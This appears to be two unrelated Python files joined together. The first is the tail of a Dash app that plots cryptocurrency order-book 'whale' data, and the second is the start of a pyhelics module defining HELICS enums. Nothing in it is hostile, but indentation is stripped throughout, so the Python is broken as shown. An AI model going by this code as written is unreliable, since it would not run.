"See GitHub link above for further details.", html.Br()]),
# Create Div to place a conditionally visible loading animation.
html.Div(id="loader", style= {'display': 'block'}, children=[html.Div(className="loader"), html.Div('Hunting Whales...', className='loader-text')]# <-- This is the line that will be changed by the dropdown callback
)
]
cCache = []
for pair in PAIRS:
ticker = pair.ticker
exchange = pair.exchange
graph = 'live-graph-' + exchange + "-" + ticker
cCache.append(html.Br())
cCache.append(html.Div(id=graph))
static_content_after = dcc.Interval(
id='main-interval-component',
interval=clientRefresh * 1000
)
app.layout = html.Div(id='main_container', children=[
html.Div(static_content_before),
html.Div(id='graphs_Container', children=cCache),
html.Div(static_content_after),
])
def prepare_data(ticker, exchange):
combined = exchange + ticker
data = get_data_cache(combined)
pair.newData = False
base_currency = ticker.split("-")[1]
ob_ask = depth_ask[combined]
ob_bid = depth_bid[combined]
#Get Minimum and Maximum
ladder_Bid_Min = fixNan(shape_bid[combined]['volume'].min())
ladder_Bid_Max = fixNan(shape_bid[combined]['volume'].max(), False)
ladder_Ask_Min = fixNan(shape_ask[combined]['volume'].min())
ladder_Ask_Max = fixNan(shape_ask[combined]['volume'].max(), False)
data_min = fixNan(data[TBL_VOLUME].min())
data_max = fixNan(data[TBL_VOLUME].max(), False)
ob_bid_max = fixNan(ob_bid[TBL_VOLUME].max(), False)
ob_ask_max = fixNan(ob_ask[TBL_VOLUME].max(), False)
symbol = SYMBOLS.get(base_currency.upper(), "")
x_min = min([ladder_Bid_Min, ladder_Ask_Min, data_min])
x_max = max([ladder_Bid_Max, ladder_Ask_Max, data_max, ob_ask_max, ob_bid_max])
max_unique = max([fixNan(shape_bid[combined]['unique'].max(), False),
fixNan(shape_ask[combined]['unique'].max(), False)])
width_factor = 15
if max_unique > 0: width_factor = 15 / max_unique
market_price = marketPrice[combined]
bid_trace = go.Scatter(
x=[], y=[],
text=[],
mode='markers', hoverinfo='text',
marker=dict(opacity=0, color='rgb(0,255,0)'))
ask_trace = go.Scatter(
x=[], y=[],
text=[],
mode='markers', hoverinfo='text',
marker=dict(opacity=0, color='rgb(255,0,0)'))
shape_arr = [dict(
# Line Horizontal
type='line',
x0=x_min * 0.5, y0=market_price,
x1=x_max * 1.5, y1=market_price,
line=dict(color='rgb(0, 0, 0)', width=2, dash='dash')
)]
annot_arr = [dict(
x=log10((x_max*0.9)), y=market_price, xref='x', yref='y',
text=str(market_price) + symbol,
showarrow=True, arrowhead=7, ax=20, ay=0,
bgcolor='rgb(0,0,255)', font={'color': '#ffffff'}
)]
# delete these 10 lines below if we want to move to a JS-based coloring system in the future
shape_arr.append(dict(type='rect',
x0=x_min, y0=market_price,
x1=x_max, y1=market_price * 1.05,
line=dict(color='rgb(255, 0, 0)', width=0.01),
fillcolor='rgba(255, 0, 0, 0.04)'))
shape_arr.append(dict(type='rect',
x0=x_min, y0=market_price,
x1=x_max, y1=market_price * 0.95,
line=dict(color='rgb(0, 255, 0)', width=0.01),
fillcolor='rgba(0, 255, 0, 0.04)'))
for index, row in shape_bid[combined].iterrows():
cWidth = row['unique'] * width_factor
vol = row[TBL_VOLUME]
posY = (row['min_Price'] + row['max_Price']) / 2.0
if cWidth > 15:
cWidth = 15
elif cWidth < 2:
cWidth = 2
shape_arr.append(dict(type='line',
opacity=0.5,
x0=vol, y0=row['min_Price'],
x1=vol, y1=row['max_Price'],
line=dict(color='rgb(0, 255, 0)', width=cWidth)))
bid_trace['x'].append(vol)
bid_trace['y'].append(row['min_Price'])
bid_trace['text'].append(row['text'])
bid_trace['text'].append(row['text'])
bid_trace['x'].append(vol)
bid_trace['y'].append(posY)
bid_trace['x'].append(vol)
bid_trace['y'].append(row['max_Price'])
bid_trace['text'].append(row['text'])
for index, row in shape_ask[combined].iterrows():
cWidth = row['unique'] * width_factor
vol = row[TBL_VOLUME]
posY = (row['min_Price'] + row['max_Price']) / 2.0
if cWidth > 15:
cWidth = 15
elif cWidth < 2:
cWidth = 2
shape_arr.append(dict(type='line',
opacity=0.5,
x0=vol, y0=row['min_Price'],
x1=vol, y1=row['max_Price'],
line=dict(color='rgb(255, 0, 0)', width=cWidth)))
ask_trace['x'].append(vol)
ask_trace['y'].append(row['min_Price'])
ask_trace['text'].append(row['text'])
ask_trace['x'].append(vol)
ask_trace['y'].append(posY)
ask_trace['text'].append(row['text'])
ask_trace['x'].append(vol)
ask_trace['y'].append(row['max_Price'])
ask_trace['text'].append(row['text'])
result = {
'data': [
go.Scatter(
x=data[TBL_VOLUME],
y=data[TBL_PRICE],
mode='markers',
text=data['text'],
opacity=0.95,
hoverinfo='text',
marker={
'size': data['sqrt'],
'line': {'width': 0.5, 'color': 'white'},
'color': data['color']
},
), ask_trace, bid_trace, go.Scatter(
x=ob_ask[TBL_VOLUME],
y=ob_ask[TBL_PRICE],
mode='lines',
opacity=0.5,
hoverinfo='text',
text=ob_ask['text'],
line = dict(color = ('rgb(255, 0, 0)'),
width = 2)
),go.Scatter(
x=ob_bid[TBL_VOLUME],
y=ob_bid[TBL_PRICE],
mode='lines',
opacity=0.5,
hoverinfo='text',
text=ob_bid['text'],
line = dict(color = ('rgb(0, 255, 0)'),
width = 2)
)
],
'layout': go.Layout(
# title automatically updates with refreshed market price
title=("The present market price of {} on {} is: {}{} at {}".format(ticker, exchange, symbol,
str(
marketPrice[combined]),
timeStamps[combined])),
xaxis=dict(title='Order Size', type='log', autotick=True,range=[log10(x_min*0.95), log10(x_max*1.03)]),
yaxis={'title': '{} Price'.format(ticker),'range':[market_price*0.94, market_price*1.06]},
hovermode='closest',
# now code to ensure the sizing is right
margin=go.Margin(
l=75, r=75,
b=50, t=50,
pad=4),
paper_bgcolor='rgba(0,0,0,0)', # set bg to be transparent, works with themes.
plot_bgcolor='rgba(0,0,0,0)', # set bg to be transparent, works with themes.
# adding the horizontal reference line at market price
shapes=shape_arr,
annotations=annot_arr,
showlegend=False
)
}
return result
def prepare_send():
lCache = []
cData = get_All_data()
for pair in PAIRS:
ticker = pair.ticker
exchange = pair.exchange
graph = 'live-graph-' + exchange + "-" + ticker
lCache.append(html.Br())
if (pair.Dataprepared):
lCache.append(dcc.Graph(
className='plot',
id=graph,
figure=cData[exchange + ticker]
))
else:
lCache.append(html.Div(className='plot', id=graph))
return lCache
# links up the chart creation to the interval for an auto-refresh
# creates one callback per currency pairing; easy to replicate / add new pairs
@app.callback(Output('graphs_Container', 'children'),
events=[Event('main-interval-component', 'interval')])
def update_Site_data():
return getSendCache()
# explanatory comment here to come
def round_sig(x, sig=3, overwrite=0, minimum=0):
if (x == 0):
return 0.0
elif overwrite > 0:
return round(x, overwrite)
else:
digits = -int(floor(log10(abs(x)))) + (sig - 1)
if digits <= minimum:
return round(x, minimum)
else:
return round(x, digits)
# explanatory comment here to come
def calcColor(x):
response = round(400 / x)
if response > 255:
response = 255
elif response < 30:
response = 30
return response
def fixNan(x, pMin=True):
if isnan(x):
if pMin:
return 99999
else:
return 0
else:
return x
def getStamp():
return int(round(time.time() * 1000))
# watchdog to catch any instances where refresh stops
def watchdog():
global PAIRS
tServer = threading.Thread(target=serverThread)
tServer.daemon = False
tServer.start()
time.sleep(3) # get Server start
log(2,"Server should be running now")
tPreparer = threading.Thread(target=sendPrepareThread)
tPreparer.daemon = False
tPreparer.start()
for pair in PAIRS:
pair.threadWebsocket = threading.Thread(
target=websockThread, args=(pair,))
pair.threadWebsocket.daemon = False
pair.threadWebsocket.start()
time.sleep(3)
log(2,"Web sockets up")
for pair in PAIRS:
pair.threadRecalc = threading.Thread(target=recalcThread, args=(pair,))
pair.threadRecalc.daemon = False
pair.threadRecalc.start()
time.sleep(2.5)
log(2,"ReCalc up")
for pair in PAIRS:
pair.threadPrepare = threading.Thread(
target=preparePairThread, args=(pair,))
pair.threadPrepare.daemon = False
pair.threadPrepare.start()
log(2,"Everything should be running now, starting Watchdog, to control the herd")
while True:
time.sleep(2)
alive = True
for pair in PAIRS:
if not pair.threadRecalc.isAlive():
alive = False
log(2,"Restarting pair Recalc " +
pair.exchange + " " + pair.ticker)
pair.threadRecalc = threading.Thread(
target=recalcThread, args=(pair,))
pair.threadRecalc.daemon = False
pair.threadRecalc.start()
if not pair.threadWebsocket.isAlive():
alive = False
log(2,"Restarting pair Web socket " +
pair.exchange + " " + pair.ticker)
pair.webSocketKill = 1
pair.threadWebsocket = threading.Thread(
target=websockThread, args=(pair,))
pair.threadWebsocket.daemon = False
pair.threadWebsocket.start()
if not pair.threadPrepare.isAlive():
alive = False
log(2,"Restarting pair Prepare worker " +
pair.exchange + " " + pair.ticker)
pair.threadPrepare = threading.Thread(
target=preparePairThread, args=(pair,))
pair.threadPrepare.daemon = False
pair.threadPrepare.start()
if not tServer.isAlive():
alive = False
log(3,"Watchdog detected dead Server, restarting")
tServer = threading.Thread(target=serverThread)
tServer.daemon = False
tServer.start()
if not tPreparer.isAlive():
alive = False
log(3,"Watchdog detected dead Preparer, restarting")
tPreparer = threading.Thread(target=sendPrepareThread)
tPreparer.daemon = False
tPreparer.start()
if not alive:
log(3,"Watchdog got some bad sheeps back to group")
def serverThread():
app.run_server(host='0.0.0.0', port=serverPort)
def sendPrepareThread():
global sendCache, first_prepare, overallNewData
while True:
sendCache = prepare_send()
overallNewData = False
time.sleep(0.5)
while not overallNewData:
time.sleep(0.5)
def recalcThread(pair):
count = 0
refreshes = 0
while True:
if (pair.websocket):
dif = getStamp() - pair.lastStamp
if dif > desiredPairRefresh:
log(1,"Ms Diff for " + pair.ticker + " is " + str(
dif) + " Total refreshes for pair " + str(refreshes))
refreshes += 1
if not calc_data(pair):
count = count + 1
else:
count = 0
pair.lastStamp = pair.usedStamp
if count > 5:
log(3,"Going to kill Web socket from " + pair.ticker)
count = -5
pair.webSocketKill = 0
else:
time.sleep((desiredPairRefresh - dif) / 1000)
def websockThread(pair):
pair.websocket = False
pair.ob_Inst = GDaxBook(pair.ticker)
time.sleep(5)
pair.websocket = True
while True:
kill = 5 / pair.webSocketKill
time.sleep(4)
def preparePairThread(pair):
global prepared, overallNewData
ticker = pair.ticker
exc = pair.exchange
cbn = exc + ticker
while True:
if (pair.prepare):
prepared[cbn] = prepare_data(ticker, exc)
overallNewData = True
pair.Dataprepared = True
while not pair.newData:
time.sleep(0.2)
def handleArgs(argv):
global serverPort, debugLevel, desiredPairRefresh
try:
opts, args = getopt.getopt(
argv, "hp:d:", ["port=","debug=","pRefresh="])
except getopt.GetoptError:
print('app.py -h')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('app.py --port 8050 --pRefresh')
print('--pRefresh indicates the refresh Rate in ms')
sys.exit()
elif opt in ("-p", "--port"):
serverPort = int(arg)
elif opt in ("-d", "--debug"):
debugLevel = int(arg)
elif opt in ("--pRefresh"):
desiredPairRefresh = int(arg)
log(4,"Legend: This is an error message")
log(3,"Legend: This is a warning message")
log(2,"Legend: This is an info message")
log(1,"Legend: This is a debug message")
log(0,"Legend: This is a deep debug message")
log(1,'Web Interface Port is ' + str(serverPort))
log(1,'Debug Level is ' + str(debugLevel))
if __name__ == '__main__':
# Initial Load of Data
handleArgs(sys.argv[1:])
watchdog()
|
capi.py
|
# -*- coding: utf-8 -*-
import logging
import warnings
import json
import weakref
import os
from enum import IntEnum, unique
try:
from typing import Dict, List, Tuple, Union, Any
JSONType = Union[
Dict[str, Any],
List[dict],
]
except ImportError:
pass
from . import _build
lib = _build.lib
ffi = _build.ffi
PYHELICS_CLEANUP = os.environ.get("PYHELICS_CLEANUP", False)
if ffi.string(lib.helicsGetVersion()).decode().startswith("2."):
HELICS_VERSION = 2
else:
HELICS_VERSION = 3
HELICS_TIME_ZERO = 0.0 # definition of time zero-the beginning of simulation
HELICS_TIME_EPSILON = 1.0e-9 # definition of the minimum time resolution
HELICS_TIME_INVALID = -1.785e39 # definition of an invalid time that has no meaning
HELICS_TIME_MAXTIME = 9223372036.854774
helics_time_zero = HELICS_TIME_ZERO
helics_time_epsilon = HELICS_TIME_EPSILON
helics_time_invalid = HELICS_TIME_INVALID
helics_time_maxtime = HELICS_TIME_MAXTIME
HelicsTime = float
pointer = int
@unique
class HelicsSequencingMode(IntEnum):
"""
Enumeration of sequencing modes for queries
fast is the default, meaning the query travels along priority channels and takes precedence of over
existing messages; ordered means it follows normal priority patterns and will be ordered along with
existing messages
- **FAST**
- **ORDERED**
- **DEFAULT**
"""
FAST = 0
ORDERED = 1
DEFAULT = 2
HELICS_SEQUENCING_MODE_FAST = HelicsSequencingMode.FAST
HELICS_SEQUENCING_MODE_ORDERED = HelicsSequencingMode.ORDERED
HELICS_SEQUENCING_MODE_DEFAULT = HelicsSequencingMode.DEFAULT
helics_sequencing_mode_fast = HelicsSequencingMode.FAST
helics_sequencing_mode_ordered = HelicsSequencingMode.ORDERED
helics_sequencing_mode_default = HelicsSequencingMode.DEFAULT
@unique
class HelicsCoreType(IntEnum):
"""
- **DEFAULT**
- **TEST**
- **INTERPROCESS**
- **IPC**
- **TCP**
- **UDP**
- **NNG**
- **ZMQ_TEST**
- **TCP_SS**
- **HTTP**
- **WEBSOCKET**
- **INPROC**
- **NULL**
"""
DEFAULT = 0 # HelicsCoreType
ZMQ = 1 # HelicsCoreType
MPI = 2 # HelicsCoreType
TEST = 3 # HelicsCoreType
INTERPROCESS = 4 # HelicsCoreType
IPC = 5 # HelicsCoreType
TCP = 6 # HelicsCoreType
UDP = 7 # HelicsCoreType
NNG = 9 # HelicsCoreType
ZMQ_TEST = 10 # HelicsCoreType
TCP_SS = 11 # HelicsCoreType
HTTP = 12 # HelicsCoreType
WEBSOCKET = 14 # HelicsCoreType
INPROC = 18 # HelicsCoreType
NULL = 66 # HelicsCoreType
HELICS_CORE_TYPE_DEFAULT = HelicsCoreType.DEFAULT
HELICS_CORE_TYPE_ZMQ = HelicsCoreType.ZMQ
HELICS_CORE_TYPE_MPI = HelicsCoreType.MPI
HELICS_CORE_TYPE_TEST = HelicsCoreType.TEST
HELICS_CORE_TYPE_INTERPROCESS = HelicsCoreType.INTERPROCESS
HELICS_CORE_TYPE_IPC = HelicsCoreType.IPC
HELICS_CORE_TYPE_TCP = HelicsCoreType.TCP
HELICS_CORE_TYPE_UDP = HelicsCoreType.UDP
HELICS_CORE_TYPE_ZMQ_TEST = HelicsCoreType.ZMQ_TEST
HELICS_CORE_TYPE_NNG = HelicsCoreType.NNG
HELICS_CORE_TYPE_TCP_SS = HelicsCoreType.TCP_SS
HELICS_CORE_TYPE_HTTP = HelicsCoreType.HTTP
HELICS_CORE_TYPE_WEBSOCKET = HelicsCoreType.WEBSOCKET
HELICS_CORE_TYPE_INPROC = HelicsCoreType.INPROC
HELICS_CORE_TYPE_NULL = HelicsCoreType.NULL
helics_core_type_default = HelicsCoreType.DEFAULT
helics_core_type_zmq = HelicsCoreType.ZMQ
helics_core_type_mpi = HelicsCoreType.MPI
helics_core_type_test = HelicsCoreType.TEST
helics_core_type_interprocess = HelicsCoreType.INTERPROCESS
helics_core_type_ipc = HelicsCoreType.IPC
helics_core_type_tcp = HelicsCoreType.TCP
helics_core_type_udp = HelicsCoreType.UDP
helics_core_type_zmq_test = HelicsCoreType.ZMQ_TEST
helics_core_type_nng = HelicsCoreType.NNG
helics_core_type_tcp_ss = HelicsCoreType.TCP_SS
helics_core_type_http = HelicsCoreType.HTTP
helics_core_type_websocket = HelicsCoreType.WEBSOCKET
helics_core_type_inproc = HelicsCoreType.INPROC
helics_core_type_null = HelicsCoreType.NULL
@unique
class HelicsDataType(IntEnum):
"""
- **STRING**
- **DOUBLE**
- **INT**
- **COMPLEX**
- **VECTOR**
- **COMPLEX_VECTOR**
- **NAMED_POINT**
- **BOOLEAN**
- **TIME**
- **RAW**
- **JSON**
- **MULTI**
- **ANY**
"""
STRING = 0 # HelicsDataType
DOUBLE = 1 # HelicsDataType
INT = 2 # HelicsDataType
COMPLEX = 3 # HelicsDataType
VECTOR = 4 # HelicsDataType
COMPLEX_VECTOR = 5 # HelicsDataType
NAMED_POINT = 6 # HelicsDataType
BOOLEAN = 7 # HelicsDataType
TIME = 8 # HelicsDataType
RAW = 25 # HelicsDataType
JSON = 30 # HelicsDataType
MULTI = 33 # HelicsDataType
ANY = 25262 # HelicsDataType
HELICS_DATA_TYPE_STRING = HelicsDataType.STRING
HELICS_DATA_TYPE_CHAR = HelicsDataType.STRING
HELICS_DATA_TYPE_DOUBLE = HelicsDataType.DOUBLE
HELICS_DATA_TYPE_INT = HelicsDataType.INT
HELICS_DATA_TYPE_COMPLEX = HelicsDataType.COMPLEX
HELICS_DATA_TYPE_VECTOR = HelicsDataType.VECTOR
HELICS_DATA_TYPE_COMPLEX_VECTOR = HelicsDataType.COMPLEX_VECTOR
HELICS_DATA_TYPE_NAMED_POINT = HelicsDataType.NAMED_POINT
HELICS_DATA_TYPE_BOOLEAN = HelicsDataType.BOOLEAN
HELICS_DATA_TYPE_TIME = HelicsDataType.TIME
HELICS_DATA_TYPE_RAW = HelicsDataType.RAW
HELICS_DATA_TYPE_JSON = HelicsDataType.JSON
HELICS_DATA_TYPE_MULTI = HelicsDataType.MULTI
HELICS_DATA_TYPE_ANY = HelicsDataType.ANY
helics_data_type_string = HelicsDataType.STRING
helics_data_type_char = HelicsDataType.STRING
helics_data_type_double = HelicsDataType.DOUBLE
helics_data_type_int = HelicsDataType.INT
helics_data_type_complex = HelicsDataType.COMPLEX
helics_data_type_vector = HelicsDataType.VECTOR
helics_data_type_complex_vector = HelicsDataType.COMPLEX_VECTOR
helics_data_type_named_point = HelicsDataType.NAMED_POINT
helics_data_type_boolean = HelicsDataType.BOOLEAN
helics_data_type_time = HelicsDataType.TIME
helics_data_type_raw = HelicsDataType.RAW
helics_data_type_json = HelicsDataType.JSON
helics_data_type_multi = HelicsDataType.MULTI
helics_data_type_any = HelicsDataType.ANY
# enumeration of general flags that can be used in federates/cores/brokers
@unique
class HelicsFlag(IntEnum):
# flag specifying that a federate, core, or broker may be slow to respond to pings If the federate goes offline there is no good way to detect it so use with caution
SLOW_RESPONDING = 29
# flag specifying the federate/core/broker is operating in a user debug mode so deadlock timers and timeout are disabled this flag is a combination of slow_responding and disabling of some timeouts
DEBUGGING = 31
# specify that a federate error should terminate the federation
TERMINATE_ON_ERROR = 72
# specify that the log files should be flushed on every log message
FORCE_LOGGING_FLUSH = 88
# specify that a full log should be dumped into a file
DUMPLOG = 89
# specify that helics should capture profiling data
PROFILING = 93
# flag trigger for generating a profiling marker
PROFILING_MARKER = 95
HELICS_FLAG_SLOW_RESPONDING = HelicsFlag.SLOW_RESPONDING
HELICS_FLAG_DEBUGGING = HelicsFlag.DEBUGGING
HELICS_FLAG_TERMINATE_ON_ERROR = HelicsFlag.TERMINATE_ON_ERROR
HELICS_FLAG_FORCE_LOGGING_FLUSH = HelicsFlag.FORCE_LOGGING_FLUSH
HELICS_FLAG_DUMPLOG = HelicsFlag.DUMPLOG
HELICS_FLAG_PROFILING = HelicsFlag.PROFILING
HELICS_FLAG_PROFILING_MARKER = HelicsFlag.PROFILING_MARKER
helics_flag_slow_responding = HelicsFlag.SLOW_RESPONDING
helics_flag_debugging = HelicsFlag.DEBUGGING
helics_flag_terminate_on_error = HelicsFlag.TERMINATE_ON_ERROR
helics_flag_force_logging_flush = HelicsFlag.FORCE_LOGGING_FLUSH
helics_flag_dumplog = HelicsFlag.DUMPLOG
helics_flag_profiling = HelicsFlag.PROFILING
helics_flag_profiling_marker = HelicsFlag.PROFILING_MARKER
@unique
class HelicsFederateFlag(IntEnum):
"""
- **OBSERVER**
- **UNINTERRUPTIBLE**
- **INTERRUPTIBLE**
- **SOURCE_ONLY**
- **ONLY_TRANSMIT_ON_CHANGE**
- **ONLY_UPDATE_ON_CHANGE**
- **WAIT_FOR_CURRENT_TIME_UPDATE**
- **RESTRICTIVE_TIME_POLICY**
- **ROLLBACK**
- **FORWARD_COMPUTE**
- **REALTIME**
- **SINGLE_THREAD_FEDERATE**
- **IGNORE_TIME_MISMATCH_WARNINGS**
- **STRICT_CONFIG_CHECKING**
- **USE_JSON_SERIALIZATION**
- **EVENT_TRIGGERED**
- **LOCAL_PROFILING_CAPTURE**
"""
# flag indicating that a federate is observe only
OBSERVER = 0
# flag indicating that a federate can only return requested times
UNINTERRUPTIBLE = 1
# flag indicating that a federate can be interrupted
INTERRUPTIBLE = 2
# flag indicating that a federate/interface is a signal generator only
SOURCE_ONLY = 4
# flag indicating a federate/interface should only transmit values if they have changed (binary equivalence)
ONLY_TRANSMIT_ON_CHANGE = 6
# flag indicating a federate/interface should only trigger an update if a value has changed (binary equivalence)
ONLY_UPDATE_ON_CHANGE = 8
# flag indicating a federate should only grant time if all other federates have already passed the requested time
WAIT_FOR_CURRENT_TIME_UPDATE = 10
# flag indicating a federate should operate on a restrictive time policy, which disallows some 2nd order time evaluation and can be useful for certain types of dependency cycles and update patterns, but generally shouldn't be used as it can lead to some very slow update conditions
RESTRICTIVE_TIME_POLICY = 11
# flag indicating that a federate has rollback capability
ROLLBACK = 12
# flag indicating that a federate performs forward computation and does internal rollback
FORWARD_COMPUTE = 14
# flag indicating that a federate needs to run in real time
REALTIME = 16
# flag indicating that the federate will only interact on a single thread
SINGLE_THREAD_FEDERATE = 27
# used to not display warnings on mismatched requested times
IGNORE_TIME_MISMATCH_WARNINGS = 67
# specify that checking on configuration files should be strict and throw and error on any invalid values
STRICT_CONFIG_CHECKING = 75
# specify that the federate should use json serialization for all data types
USE_JSON_SERIALIZATION = 79
# specify that the federate is event triggered-meaning (all/most) events are triggered by incoming events
EVENT_TRIGGERED = 81
# specify that that federate should capture the profiling data to the local federate logging system
LOCAL_PROFILING_CAPTURE = 96
HELICS_FLAG_OBSERVER = HelicsFederateFlag.OBSERVER
HELICS_FLAG_UNINTERRUPTIBLE = HelicsFederateFlag.UNINTERRUPTIBLE
HELICS_FLAG_INTERRUPTIBLE = HelicsFederateFlag.INTERRUPTIBLE
HELICS_FLAG_SOURCE_ONLY = HelicsFederateFlag.SOURCE_ONLY
HELICS_FLAG_ONLY_TRANSMIT_ON_CHANGE = HelicsFederateFlag.ONLY_TRANSMIT_ON_CHANGE
HELICS_FLAG_ONLY_UPDATE_ON_CHANGE = HelicsFederateFlag.ONLY_UPDATE_ON_CHANGE
HELICS_FLAG_WAIT_FOR_CURRENT_TIME_UPDATE = HelicsFederateFlag.WAIT_FOR_CURRENT_TIME_UPDATE
HELICS_FLAG_RESTRICTIVE_TIME_POLICY = HelicsFederateFlag.RESTRICTIVE_TIME_POLICY
HELICS_FLAG_ROLLBACK = HelicsFederateFlag.ROLLBACK
HELICS_FLAG_FORWARD_COMPUTE = HelicsFederateFlag.FORWARD_COMPUTE
HELICS_FLAG_REALTIME = HelicsFederateFlag.REALTIME
HELICS_FLAG_SINGLE_THREAD_FEDERATE = HelicsFederateFlag.SINGLE_THREAD_FEDERATE
HELICS_FLAG_IGNORE_TIME_MISMATCH_WARNINGS = HelicsFederateFlag.IGNORE_TIME_MISMATCH_WARNINGS
HELICS_FLAG_STRICT_CONFIG_CHECKING = HelicsFederateFlag.STRICT_CONFIG_CHECKING
HELICS_FLAG_USE_JSON_SERIALIZATION = HelicsFederateFlag.USE_JSON_SERIALIZATION
HELICS_FLAG_EVENT_TRIGGERED = HelicsFederateFlag.EVENT_TRIGGERED
HELICS_FLAG_LOCAL_PROFILING_CAPTURE = HelicsFederateFlag.LOCAL_PROFILING_CAPTURE
helics_flag_observer = HelicsFederateFlag.OBSERVER
helics_flag_uninterruptible = HelicsFederateFlag.UNINTERRUPTIBLE
helics_flag_interruptible = HelicsFederateFlag.INTERRUPTIBLE
helics_flag_source_only = HelicsFederateFlag.SOURCE_ONLY
helics_flag_only_transmit_on_change = HelicsFederateFlag.ONLY_TRANSMIT_ON_CHANGE
helics_flag_only_update_on_change = HelicsFederateFlag.ONLY_UPDATE_ON_CHANGE
helics_flag_wait_for_current_time_update = HelicsFederateFlag.WAIT_FOR_CURRENT_TIME_UPDATE
helics_flag_restrictive_time_policy = HelicsFederateFlag.RESTRICTIVE_TIME_POLICY
helics_flag_rollback = HelicsFederateFlag.ROLLBACK
helics_flag_forward_compute = HelicsFederateFlag.FORWARD_COMPUTE
helics_flag_realtime = HelicsFederateFlag.REALTIME
helics_flag_single_thread_federate = HelicsFederateFlag.SINGLE_THREAD_FEDERATE
helics_flag_ignore_time_mismatch_warnings = HelicsFederateFlag.IGNORE_TIME_MISMATCH_WARNINGS
helics_flag_strict_config_checking = HelicsFederateFlag.STRICT_CONFIG_CHECKING
helics_flag_use_json_serialization = HelicsFederateFlag.USE_JSON_SERIALIZATION
helics_flag_event_triggered = HelicsFederateFlag.EVENT_TRIGGERED
helics_flag_local_profiling_capture = HelicsFederateFlag.LOCAL_PROFILING_CAPTURE
class HelicsCoreFlag(IntEnum):
# used to delay a core from entering initialization mode even if it would otherwise be ready
DELAY_INIT_ENTRY = 45
# used to clear the HELICS_DELAY_INIT_ENTRY flag in cores
ENABLE_INIT_ENTRY = 47
IGNORE = 999
HELICS_FLAG_DELAY_INIT_ENTRY = HelicsCoreFlag.DELAY_INIT_ENTRY
HELICS_FLAG_ENABLE_INIT_ENTRY = HelicsCoreFlag.ENABLE_INIT_ENTRY
helics_flag_delay_init_entry = HelicsCoreFlag.DELAY_INIT_ENTRY
helics_flag_enable_init_entry = HelicsCoreFlag.ENABLE_INIT_ENTRY
if HELICS_VERSION == 2:
@unique
class HelicsLogLevel(IntEnum):
"""
- **NO_PRINT**
- **ERROR**
- **WARNING**
- **SUMMARY**
- **CONNECTIONS**
- **INTERFACES**
- **TIMING**
- **DATA**
- **TRACE**
"""
DUMPLOG = -10 # HelicsLogLevels
NO_PRINT = -1 # HelicsLogLevels
ERROR = 0 # HelicsLogLevels
WARNING = 1 # HelicsLogLevels
SUMMARY = 2 # HelicsLogLevels
CONNECTIONS = 3 # HelicsLogLevels
INTERFACES = 4 # HelicsLogLevels
TIMING = 5 # HelicsLogLevels
DATA = 6 # HelicsLogLevels
DEBUG = 7 # HelicsLogLevels
else:
@unique
class HelicsLogLevel(IntEnum):
"""
- **NO_PRINT**
- **ERROR**
- **WARNING**
- **SUMMARY**
- **CONNECTIONS**
- **INTERFACES**
- **TIMING**
- **DATA**
- **DEBUG**
- **TRACE**
"""
DUMPLOG = -10 # HelicsLogLevels
NO_PRINT = -4 # HelicsLogLevels
ERROR = 0 # HelicsLogLevels
PROFILING = 2 # HelicsLogLevels
WARNING = 3 # HelicsLogLevels
SUMMARY = 6 # HelicsLogLevels
CONNECTIONS = 9 # HelicsLogLevels
INTERFACES = 12 # HelicsLogLevels
TIMING = 15 # HelicsLogLevels
DATA = 18 # HelicsLogLevels
DEBUG = 21 # HelicsLogLevels
TRACE = 24 # HelicsLogLevels
try:
HELICS_LOG_LEVEL_DUMPLOG = HelicsLogLevel.DUMPLOG
except:
pass
HELICS_LOG_LEVEL_NO_PRINT = HelicsLogLevel.NO_PRINT
HELICS_LOG_LEVEL_ERROR = HelicsLogLevel.ERROR
try:
HELICS_LOG_LEVEL_PROFILING = HelicsLogLevel.PROFILING
except:
pass
HELICS_LOG_LEVEL_WARNING = HelicsLogLevel.WARNING
HELICS_LOG_LEVEL_SUMMARY = HelicsLogLevel.SUMMARY
HELICS_LOG_LEVEL_CONNECTIONS = HelicsLogLevel.CONNECTIONS
HELICS_LOG_LEVEL_INTERFACES = HelicsLogLevel.INTERFACES
HELICS_LOG_LEVEL_TIMING = HelicsLogLevel.TIMING
HELICS_LOG_LEVEL_DATA = HelicsLogLevel.DATA
HELICS_LOG_LEVEL_DEBUG = HelicsLogLevel.DEBUG
try:
HELICS_LOG_LEVEL_TRACE = HelicsLogLevel.TRACE
except:
HELICS_LOG_LEVEL_TRACE = HelicsLogLevel.DEBUG
pass
helics_log_level_no_print = HelicsLogLevel.NO_PRINT
helics_log_level_error = HelicsLogLevel.ERROR
try:
helics_log_level_profiling = HelicsLogLevel.PROFILING
except:
pass
helics_log_level_warning = HelicsLogLevel.WARNING
helics_log_level_summary = HelicsLogLevel.SUMMARY
helics_log_level_connections = HelicsLogLevel.CONNECTIONS
helics_log_level_interfaces = HelicsLogLevel.INTERFACES
helics_log_level_timing = HelicsLogLevel.TIMING
helics_log_level_data = HelicsLogLevel.DATA
helics_log_level_debug = HelicsLogLevel.DEBUG
try:
helics_log_level_trace = HelicsLogLevel.TRACE
except:
helics_log_level_trace = HelicsLogLevel.DEBUG
pass
@unique
class HelicsError(IntEnum):
"""
- **FATAL**
- **EXTERNAL_TYPE**
- **OTHER**
- **INSUFFICIENT_SPACE**
- **EXECUTION_FAILURE**
- **INVALID_FUNCTION_CALL**
- **INVALID_STATE_TRANSITION**
- **WARNING**
- **SYSTEM_FAILURE**
- **DISCARD**
- **INVALID_ARGUMENT**
- **INVALID_OBJECT**
- **CONNECTION_FAILURE**
- **REGISTRATION_FAILURE**
- **OK**
"""
FATAL = -404 # HelicsErrorTypes
EXTERNAL_TYPE = -203 # HelicsErrorTypes
OTHER = -101 # HelicsErrorTypes
USER_ABORT = -27 # HelicsErrorTypes
INSUFFICIENT_SPACE = -18 # HelicsErrorTypes
EXECUTION_FAILURE = -14 # HelicsErrorTypes
INVALID_FUNCTION_CALL = -10 # HelicsErrorTypes
INVALID_STATE_TRANSITION = -9 # HelicsErrorTypes
WARNING = -8 # HelicsErrorTypes
SYSTEM_FAILURE = -6 # HelicsErrorTypes
DISCARD = -5 # HelicsErrorTypes
INVALID_ARGUMENT = -4 # HelicsErrorTypes
INVALID_OBJECT = -3 # HelicsErrorTypes
CONNECTION_FAILURE = -2 # HelicsErrorTypes
REGISTRATION_FAILURE = -1 # HelicsErrorTypes
OK = 0 # HelicsErrorTypes
HELICS_ERROR_FATAL = HelicsError.FATAL
HELICS_ERROR_EXTERNAL_TYPE = HelicsError.EXTERNAL_TYPE
